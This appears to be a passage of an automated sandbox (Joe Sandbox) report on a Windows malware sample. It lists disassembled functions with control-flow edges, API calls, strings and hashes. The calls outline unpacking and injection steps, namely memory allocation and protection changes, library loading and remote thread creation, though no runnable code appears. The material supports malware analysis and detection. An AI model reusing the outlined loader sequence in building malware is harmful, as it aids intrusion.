                                                                        • Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
                                                                        • Opcode Fuzzy Hash: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
                                                                        • Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 426 403043-403067 427 40319a-40319f 426->427 428 40306d-403085 426->428 428->427 429 40308b-40309c 428->429 430 40309e-4030a7 429->430 431 4030ac-4030ba 430->431 431->431 432 4030bc-4030c3 431->432 433 4030e5-4030ec 432->433 434 4030c5-4030e4 432->434 435 40310e-403111 433->435 436 4030ee-40310d 433->436 434->433 437 403113-403116 435->437 438 40311a 435->438 436->435 437->438 439 403118 437->439 438->430 440 40311c-403121 438->440 439->440 440->427 441 403123-403126 440->441 441->427 442 403128-403197 RtlCreateUserThread NtTerminateProcess 441->442 442->427
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_400000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                        • String ID:
                                                                        • API String ID: 1921587553-0
                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • _strlen.LIBCMT ref: 00431296
                                                                        • LocalAlloc.KERNELBASE(00000000,00467221), ref: 004312E9
                                                                        • VirtualProtect.KERNELBASE(00477FF8,0047856C,00000020,?), ref: 00431367
                                                                        • LoadLibraryA.KERNELBASE(00449F78), ref: 00431522
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: AllocLibraryLoadLocalProtectVirtual_strlen
                                                                        • String ID: $Bq $W$!$dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler$gulepulawoboxejobukade$jjj$jjj$kernel32.dll$lulugumiwitojijeponuyo$royakamexisezepucivapah$tihofozawehuluberilepesuwezawudadelanixoboxovihoxipusoy$vokejawufikuvifofefahosinipibuhucolufacedagixiyidiligokososijuvoheyepusamudefexepiwagiga${
                                                                        • API String ID: 349918097-3902791245
                                                                        • Opcode ID: 6b06d21b638aa7282f18eacee7887cae100392b5e156ec492f4e918b727b1bd6
                                                                        • Instruction ID: 415c62a77951a744553a168a51a57c6a95c62745853e107deaa3f9e8edd1f5a1
                                                                        • Opcode Fuzzy Hash: 6b06d21b638aa7282f18eacee7887cae100392b5e156ec492f4e918b727b1bd6
                                                                        • Instruction Fuzzy Hash: F3A1E131940244AFE7109B61ED89FAF7B78FB89B05F10412AF645B66B0CB741884CF6D

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 107 5d003c-5d0047 108 5d004c-5d0263 call 5d0a3f call 5d0e0f call 5d0d90 VirtualAlloc 107->108 109 5d0049 107->109 124 5d028b-5d0292 108->124 125 5d0265-5d0289 call 5d0a69 108->125 109->108 127 5d02a1-5d02b0 124->127 129 5d02ce-5d03c2 VirtualProtect call 5d0cce call 5d0ce7 125->129 127->129 130 5d02b2-5d02cc 127->130 136 5d03d1-5d03e0 129->136 130->127 137 5d0439-5d04b8 VirtualFree 136->137 138 5d03e2-5d0437 call 5d0ce7 136->138 140 5d04be-5d04cd 137->140 141 5d05f4-5d05fe 137->141 138->136 143 5d04d3-5d04dd 140->143 144 5d077f-5d0789 141->144 145 5d0604-5d060d 141->145 143->141 147 5d04e3-5d0505 143->147 148 5d078b-5d07a3 144->148 149 5d07a6-5d07b0 144->149 145->144 150 5d0613-5d0637 145->150 158 5d0517-5d0520 147->158 159 5d0507-5d0515 147->159 148->149 151 5d086e-5d08be LoadLibraryA 149->151 152 5d07b6-5d07cb 149->152 153 5d063e-5d0648 150->153 157 5d08c7-5d08f9 151->157 155 5d07d2-5d07d5 152->155 153->144 156 5d064e-5d065a 153->156 160 5d0824-5d0833 155->160 161 5d07d7-5d07e0 155->161 156->144 162 5d0660-5d066a 156->162 164 5d08fb-5d0901 157->164 165 5d0902-5d091d 157->165 166 5d0526-5d0547 158->166 159->166 163 5d0839-5d083c 160->163 167 5d07e4-5d0822 161->167 168 5d07e2 161->168 169 5d067a-5d0689 162->169 163->151 170 5d083e-5d0847 163->170 164->165 173 5d054d-5d0550 166->173 167->155 168->160 171 5d068f-5d06b2 169->171 172 5d0750-5d077a 169->172 174 5d0849 170->174 175 5d084b-5d086c 170->175 176 5d06ef-5d06fc 171->176 177 5d06b4-5d06ed 171->177 172->153 179 5d0556-5d056b 173->179 180 5d05e0-5d05ef 173->180 174->151 175->163 181 5d06fe-5d0748 176->181 182 5d074b 176->182 177->176 183 5d056d 179->183 184 5d056f-5d057a 179->184 180->143 181->182 182->169 183->180 185 5d057c-5d0599 184->185 186 5d059b-5d05bb 184->186 191 5d05bd-5d05db 185->191 186->191 191->173
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005D024D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2753538015.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_5d0000_uievsid.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: cess$kernel32.dll
                                                                        • API String ID: 4275171209-1230238691
                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction ID: fc9b128c1f50d28fefb36c0545add9695854d6336b218cbceaeb3d9a397e2676
                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction Fuzzy Hash: 7D526A74A01229DFDB64CF58C985BA8BBB1BF09314F1480DAE94DAB351DB30AE85DF14

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 443 6c07b6-6c07cf 444 6c07d1-6c07d3 443->444 445 6c07da-6c07e6 CreateToolhelp32Snapshot 444->445 446 6c07d5 444->446 447 6c07e8-6c07ee 445->447 448 6c07f6-6c0803 Module32First 445->448 446->445 447->448 455 6c07f0-6c07f4 447->455 449 6c080c-6c0814 448->449 450 6c0805-6c0806 call 6c0475 448->450 453 6c080b 450->453 453->449 455->444 455->448
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006C07DE
                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 006C07FE
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2754697355.00000000006AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 006AE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6ae000_uievsid.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 3833638111-0
                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction ID: def5cf3c4f3580666af9225adb989df78b4d5330fc621664590a6bedca8f9a12
                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction Fuzzy Hash: AEF06231200710BBE7243BB9A88DFBB76EDEF49725F10052CE642915C0DAB0EC458A61

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 456 5d0e0f-5d0e24 SetErrorMode * 2 457 5d0e2b-5d0e2c 456->457 458 5d0e26 456->458 458->457
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,005D0223,?,?), ref: 005D0E19
                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,005D0223,?,?), ref: 005D0E1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2753538015.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_5d0000_uievsid.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction ID: c5d6d6fa0513ea3056317b239f3eb2f6e5cae715dba88dd75ef451771bbf1679
                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction Fuzzy Hash: 47D0123114512877D7102A94DC09BCD7F1CDF05B62F008412FB0DD9180C770994046E5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 478 401991-4019ed call 401240 Sleep 490 4019f3-4019f5 478->490 491 4019ee call 4014c4 478->491 492 401a04-401a52 call 401240 490->492 493 4019f7-4019ff call 4015b7 490->493 491->490 493->492
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_400000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                                                        • Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
                                                                        • Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                                                        • Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 507 4019a9-4019ed call 401240 Sleep 519 4019f3-4019f5 507->519 520 4019ee call 4014c4 507->520 521 401a04-401a52 call 401240 519->521 522 4019f7-4019ff call 4015b7 519->522 520->519 522->521
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_400000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                        • Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
                                                                        • Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                        • Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 536 4019af-4019ed call 401240 Sleep 543 4019f3-4019f5 536->543 544 4019ee call 4014c4 536->544 545 401a04-401a52 call 401240 543->545 546 4019f7-4019ff call 4015b7 543->546 544->543 546->545
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_400000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                        • Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
                                                                        • Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                        • Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_400000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                                                        • Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
                                                                        • Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                                                        • Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006C04C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2754697355.00000000006AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 006AE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_6ae000_uievsid.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction ID: 191eb2deafd4c3ef59273a1b8304b638af137b4c18df169b14e6b98511b57a6a
                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction Fuzzy Hash: 70113C79A00208EFDB01DF98C985E99BBF5EF08350F058094FA489B362D771EA50DF90
                                                                        APIs
                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00431F0A
                                                                          • Part of subcall function 00432443: std::exception::exception.LIBCMT ref: 00432458
                                                                          • Part of subcall function 00432443: __CxxThrowException@8.LIBCMT ref: 0043246D
                                                                          • Part of subcall function 00432443: std::exception::exception.LIBCMT ref: 0043247E
                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00431F47
                                                                          • Part of subcall function 004323F6: std::exception::exception.LIBCMT ref: 0043240B
                                                                          • Part of subcall function 004323F6: __CxxThrowException@8.LIBCMT ref: 00432420
                                                                          • Part of subcall function 004323F6: std::exception::exception.LIBCMT ref: 00432431
                                                                        • _memmove.LIBCMT ref: 00431FA8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                                        • String ID: invalid string position$string too long
                                                                        • API String ID: 1615890066-4289949731
                                                                        • Opcode ID: 8eace0a7697c018465074f5cf330f0012f6cf608b613838aa4c2c894d7c59f1b
                                                                        • Instruction ID: 2cadb799d56146ba8edc6c72aff560a7796ad4882ddfea7e943b282292512433
                                                                        • Opcode Fuzzy Hash: 8eace0a7697c018465074f5cf330f0012f6cf608b613838aa4c2c894d7c59f1b
                                                                        • Instruction Fuzzy Hash: 0331D9323042109BD7209E5CE980B6AF7A9EBA9764F20162FF151CB3A1D769DC4087A9
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: __calloc_crt
                                                                        • String ID: `3D$p3D$5D
                                                                        • API String ID: 3494438863-1679561808
                                                                        • Opcode ID: dfb4aae6aee4ecb5de40c711e9b4d43864fbad214a1b4fa278cd1eb853dd7bf7
                                                                        • Instruction ID: de272e09e23d9250239db4a7490b72095702d82ebb5a40ea01cd9d0a8bb696a3
                                                                        • Opcode Fuzzy Hash: dfb4aae6aee4ecb5de40c711e9b4d43864fbad214a1b4fa278cd1eb853dd7bf7
                                                                        • Instruction Fuzzy Hash: 6911E732708A105BE7288F2DBC5576523A1E7D9768F24523BE915CB2D0E7B8DCC2424D
                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 00439254
                                                                          • Part of subcall function 00436B4D: __getptd_noexit.LIBCMT ref: 00436B50
                                                                          • Part of subcall function 00436B4D: __amsg_exit.LIBCMT ref: 00436B5D
                                                                        • __amsg_exit.LIBCMT ref: 00439274
                                                                        • __lock.LIBCMT ref: 00439284
                                                                        • _free.LIBCMT ref: 004392B4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                        • String ID: (;D
                                                                        • API String ID: 3170801528-2216469755
                                                                        • Opcode ID: c9deaab60658337a242e35b7a4e1c8f3ffb1bed4fe497dd85b9e8f843bd969d8
                                                                        • Instruction ID: 152704ef30623c9238207a3cfdd3a47f7cc548f2c407fd24f81e6b70bdaadf34
                                                                        • Opcode Fuzzy Hash: c9deaab60658337a242e35b7a4e1c8f3ffb1bed4fe497dd85b9e8f843bd969d8
                                                                        • Instruction Fuzzy Hash: 4A01E131D00A12B7DB21AF65840570FB7A0BF0DB56F11145BE800A3291C7BC6E41CBCD
                                                                        APIs
                                                                        • ___BuildCatchObject.LIBCMT ref: 004380D5
                                                                          • Part of subcall function 00438030: ___BuildCatchObjectHelper.LIBCMT ref: 00438066
                                                                        • _UnwindNestedFrames.LIBCMT ref: 004380EC
                                                                        • ___FrameUnwindToState.LIBCMT ref: 004380FA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                        • String ID: csm$csm
                                                                        • API String ID: 2163707966-3733052814
                                                                        • Opcode ID: 8ec11db0930f1ab87a506301e832f5c1ddd9745f274d356e72011f87bb40a249
                                                                        • Instruction ID: 130df07e853fa2f533784855c47a2f69c2e55324b64576559f26a633e08d5ed7
                                                                        • Opcode Fuzzy Hash: 8ec11db0930f1ab87a506301e832f5c1ddd9745f274d356e72011f87bb40a249
                                                                        • Instruction Fuzzy Hash: 17014B71000209BBDF226F51CC41EABBF6AFF0C394F00501ABC5814261DB3AE9B1DBA8
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: __calloc_crt__init_pointers__initptd__mtterm
                                                                        • String ID:
                                                                        • API String ID: 3132042578-0
                                                                        • Opcode ID: c8559c121642958bdeb8a5be3527d4de0f9ddb177b78d609e1602090be52ff69
                                                                        • Instruction ID: 3999fe2ea24db576f7657d23c26465a461ec30c79b1a0224d1fb40ee8fa08d6d
                                                                        • Opcode Fuzzy Hash: c8559c121642958bdeb8a5be3527d4de0f9ddb177b78d609e1602090be52ff69
                                                                        • Instruction Fuzzy Hash: 85314F79900711AADB10AF75ED0A6173AE0AB8F764B11913BE914936F0D7788841EF5C
                                                                        APIs
                                                                        • __getptd_noexit.LIBCMT ref: 00434056
                                                                          • Part of subcall function 00436AD4: ___set_flsgetvalue.LIBCMT ref: 00436AE6
                                                                          • Part of subcall function 00436AD4: __calloc_crt.LIBCMT ref: 00436AFA
                                                                          • Part of subcall function 00436AD4: __initptd.LIBCMT ref: 00436B23
                                                                        • __calloc_crt.LIBCMT ref: 00434078
                                                                        • __get_sys_err_msg.LIBCMT ref: 00434096
                                                                        • _strcpy_s.LIBCMT ref: 0043409E
                                                                        • __invoke_watson.LIBCMT ref: 004340B3
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: __calloc_crt$___set_flsgetvalue__get_sys_err_msg__getptd_noexit__initptd__invoke_watson_strcpy_s
                                                                        • String ID:
                                                                        • API String ID: 788502912-0
                                                                        • Opcode ID: f6643fcd58231390f0a0cd324d11bc9cc70a1560664bb453f01542fceb6d8df8
                                                                        • Instruction ID: 39280b0692534ef492391a93540d1e778240f8cc2ca39a1588eefa3c8cf7a6f0
                                                                        • Opcode Fuzzy Hash: f6643fcd58231390f0a0cd324d11bc9cc70a1560664bb453f01542fceb6d8df8
                                                                        • Instruction Fuzzy Hash: 4FF0F63270421427D73439665D419EBB2BCCBCC728F11653FF705A3251D52DBC4142AD
                                                                        APIs
                                                                        • __CreateFrameInfo.LIBCMT ref: 00437D3D
                                                                          • Part of subcall function 00433E96: __getptd.LIBCMT ref: 00433EA4
                                                                          • Part of subcall function 00433E96: __getptd.LIBCMT ref: 00433EB2
                                                                        • __getptd.LIBCMT ref: 00437D47
                                                                          • Part of subcall function 00436B4D: __getptd_noexit.LIBCMT ref: 00436B50
                                                                          • Part of subcall function 00436B4D: __amsg_exit.LIBCMT ref: 00436B5D
                                                                        • __getptd.LIBCMT ref: 00437D55
                                                                        • __getptd.LIBCMT ref: 00437D63
                                                                        • __getptd.LIBCMT ref: 00437D6E
                                                                          • Part of subcall function 00433F3B: __CallSettingFrame@12.LIBCMT ref: 00433F87
                                                                          • Part of subcall function 00437E3B: __getptd.LIBCMT ref: 00437E4A
                                                                          • Part of subcall function 00437E3B: __getptd.LIBCMT ref: 00437E58
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                        • String ID:
                                                                        • API String ID: 3282538202-0
                                                                        • Opcode ID: c9b1cd0b66e810f013b05a769f1013de8cf17294e1aa0560d1f900115752e0ba
                                                                        • Instruction ID: ed279d661dc42825c760b9fc98aca8d678b77b7f2585112291c896c5a2fb70ba
                                                                        • Opcode Fuzzy Hash: c9b1cd0b66e810f013b05a769f1013de8cf17294e1aa0560d1f900115752e0ba
                                                                        • Instruction Fuzzy Hash: 3111D7B1C00209EFDF01EFA5C546BADBBB0FF08319F11906AF914A7251DB389A119F54
                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 00438FB8
                                                                          • Part of subcall function 00436B4D: __getptd_noexit.LIBCMT ref: 00436B50
                                                                          • Part of subcall function 00436B4D: __amsg_exit.LIBCMT ref: 00436B5D
                                                                        • __getptd.LIBCMT ref: 00438FCF
                                                                        • __amsg_exit.LIBCMT ref: 00438FDD
                                                                        • __lock.LIBCMT ref: 00438FED
                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00439001
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                        • String ID:
                                                                        • API String ID: 938513278-0
                                                                        • Opcode ID: 2dd36e7f9b9cfc2db4ad2576282b04056c78c8fcb387764b801e0ea617750651
                                                                        • Instruction ID: c55a09df3b52eddba3e6a3b5d6970d993694369ddcd95f606bc929f609295e5e
                                                                        • Opcode Fuzzy Hash: 2dd36e7f9b9cfc2db4ad2576282b04056c78c8fcb387764b801e0ea617750651
                                                                        • Instruction Fuzzy Hash: BCF02B32901710EBD7217F769403B0DB3A05F0C729F22620FF614A72D2CF6C2A408A5D
                                                                        APIs
                                                                        Strings
                                                                        • sogudowuwotekonex digimabawer rujusogepisalojar, xrefs: 00430EF1
                                                                        • , xrefs: 00430E62
                                                                        • yoyorohexumutuwasetebayuda, xrefs: 0043102E
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: _memset
                                                                        • String ID: $sogudowuwotekonex digimabawer rujusogepisalojar$yoyorohexumutuwasetebayuda
                                                                        • API String ID: 2102423945-822714830
                                                                        • Opcode ID: 8365fa97ea0e54c40b4bae2d82204bd2bb4824526665fac2de4deb70b3f0016c
                                                                        • Instruction ID: a679fca73d2dda16af80176112bc37e6ab3a80d6958592b53a1f1885a25e40f3
                                                                        • Opcode Fuzzy Hash: 8365fa97ea0e54c40b4bae2d82204bd2bb4824526665fac2de4deb70b3f0016c
                                                                        • Instruction Fuzzy Hash: B5713B75E40208AFEB14DF94DD8AB9DB7B4FB48701F108069E609BB290C7B46A40CF69
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                        • String ID:
                                                                        • API String ID: 3016257755-0
                                                                        • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                        • Instruction ID: cfd293eb2920d9b94e498ee4755f1ba9df46740c805e4260226d03a9992dbe75
                                                                        • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                        • Instruction Fuzzy Hash: 3B116D3640018AFBCF125E84CC81CEE3F22BF1D354F599456FA5968121C73AC9B2AB85
                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 0043392D
                                                                          • Part of subcall function 004340B9: __FF_MSGBANNER.LIBCMT ref: 004340D2
                                                                          • Part of subcall function 004340B9: __NMSG_WRITE.LIBCMT ref: 004340D9
                                                                        • std::exception::exception.LIBCMT ref: 00433962
                                                                        • std::exception::exception.LIBCMT ref: 0043397C
                                                                        • __CxxThrowException@8.LIBCMT ref: 0043398D
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                        • String ID:
                                                                        • API String ID: 2388904642-0
                                                                        • Opcode ID: 89604e51622c1848ae1726d4459ef3f03cb4279c38a613a2a9ea914e2dd1109e
                                                                        • Instruction ID: 0c3675aeaf0011e457ff1f536f3ee95850dac15337a9e9b26eae673a39aafdee
